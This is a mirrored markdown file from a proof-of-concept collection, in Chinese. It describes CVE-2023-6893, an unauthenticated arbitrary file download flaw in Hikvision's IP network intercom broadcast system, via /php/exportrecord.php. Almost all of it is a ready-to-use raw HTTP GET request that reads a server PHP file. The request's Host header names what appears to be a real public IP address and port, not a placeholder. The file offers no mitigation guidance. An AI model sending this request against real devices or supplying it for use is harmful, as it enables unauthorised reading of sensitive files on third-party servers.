mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
18 lines
897 B
Markdown
18 lines
897 B
Markdown
|
|
## 海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893
|
|||
|
|
IP网络对讲广播系统在3.0.3_20201113_RELEASE(HIK)版本中存在任意文件下载漏洞,未授权的攻击者能够通过/php/exportrecord.php文件读取任意文件内容,导致服务器的敏感信息泄露
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
```
|
|||
|
|
GET /php/exportrecord.php?downtype=10&downname=C:\ICPAS\Wnmp\WWW\php\conversion.php HTTP/1.1
|
|||
|
|
Host: 219.128.48.234:4080
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Connection: close
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
X-Forwarded-For: 1.1.1.1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|